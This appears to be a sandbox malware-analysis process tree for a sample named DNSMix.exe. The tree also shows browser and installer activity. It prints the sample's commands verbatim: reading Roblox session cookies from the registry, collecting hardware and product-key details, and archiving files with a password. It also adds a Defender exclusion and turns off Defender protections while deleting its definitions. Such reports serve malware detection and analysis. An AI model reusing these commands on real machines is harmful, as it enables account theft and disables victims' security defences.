- Enumerates processes with tasklist
PID:4520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:640
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1964
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3444
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:2016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:1784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:3608
-
C:\Windows\system32\getmac.exegetmac4⤵PID:2180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35522\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\CnuNU.zip" *"3⤵PID:916
-
C:\Users\Admin\AppData\Local\Temp\_MEI35522\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI35522\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\CnuNU.zip" *4⤵
- Executes dropped EXE
PID:2516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:1124
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:1964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:4536
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2856
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:1368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:1044
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:3368
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:5092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4388
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1668
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1920 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff846e6cc40,0x7ff846e6cc4c,0x7ff846e6cc582⤵PID:3728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1840 /prefetch:22⤵PID:248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2136 /prefetch:32⤵PID:1404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:82⤵PID:2636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3260 /prefetch:12⤵PID:3372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:12⤵PID:1988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3792,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4472 /prefetch:12⤵PID:3104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4732,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:82⤵PID:1092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4768 /prefetch:82⤵PID:4420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3708,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5048 /prefetch:12⤵PID:3440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4544,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4756 /prefetch:12⤵PID:4592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3348,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3376 /prefetch:12⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4340,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:12⤵PID:3740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5140,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5088 /prefetch:12⤵PID:4176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4488,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4984 /prefetch:82⤵
- NTFS ADS
PID:1460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5364,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5352 /prefetch:12⤵PID:2932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5388,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5108 /prefetch:12⤵PID:2260
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5380,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4984 /prefetch:12⤵PID:4248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5208,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5228 /prefetch:82⤵PID:456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3436,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5500 /prefetch:82⤵PID:1196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5512,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:3900
-
-
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3400,i,4728374358470724735,10450897170100428740,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5568
-
-
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5780
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4816
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:2248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:3004
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
PID:2176
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
- System Location Discovery: System Language Discovery
PID:408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc1⤵PID:3744
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\2fc7be0a1d344bfa806e3c0e71af282f /t 3028 /p 27801⤵PID:5496
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\8c9284fb7375477a86dff25592ddc524 /t 5784 /p 57801⤵PID:416
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2992 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ff846e6cc40,0x7ff846e6cc4c,0x7ff846e6cc582⤵PID:4128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1792,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=1784 /prefetch:22⤵PID:3852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=2120 /prefetch:32⤵PID:1420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=2224 /prefetch:82⤵PID:944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:4940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=3316 /prefetch:12⤵PID:5812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3572,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=4428 /prefetch:12⤵PID:572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4308,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=4576 /prefetch:12⤵PID:5604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3464,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=3272 /prefetch:82⤵PID:1180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=3188 /prefetch:82⤵PID:5624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3748,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=4780 /prefetch:12⤵PID:5848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4600,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=4964 /prefetch:82⤵PID:5764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4996,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=5136 /prefetch:82⤵PID:2588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4484,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=5056 /prefetch:82⤵PID:3812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4980,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=5128 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:1668
-
-
C:\Users\Admin\Downloads\7z2408-x64.exe"C:\Users\Admin\Downloads\7z2408-x64.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5392,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=3108 /prefetch:12⤵PID:5880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5316,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=4292 /prefetch:12⤵PID:760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3448,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=5052 /prefetch:12⤵PID:5616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5492,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=5632 /prefetch:82⤵
- NTFS ADS
PID:2020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5372,i,9611305993658674493,9902422334233608455,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=5856 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:856
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5712
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2440
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:916
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\DNSmix\" -ad -an -ai#7zMap5667:74:7zEvent77911⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3044
-
C:\Users\Admin\Downloads\DNSmix\DNSMix\DNSMix.exe"C:\Users\Admin\Downloads\DNSmix\DNSMix\DNSMix.exe"1⤵
- Executes dropped EXE
PID:1940 -
C:\Users\Admin\Downloads\DNSmix\DNSMix\DNSMix.exe"C:\Users\Admin\Downloads\DNSmix\DNSMix\DNSMix.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:3784 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\DNSmix\DNSMix\DNSMix.exe'"3⤵PID:5912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\DNSmix\DNSMix\DNSMix.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:5784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1200
-
-
-
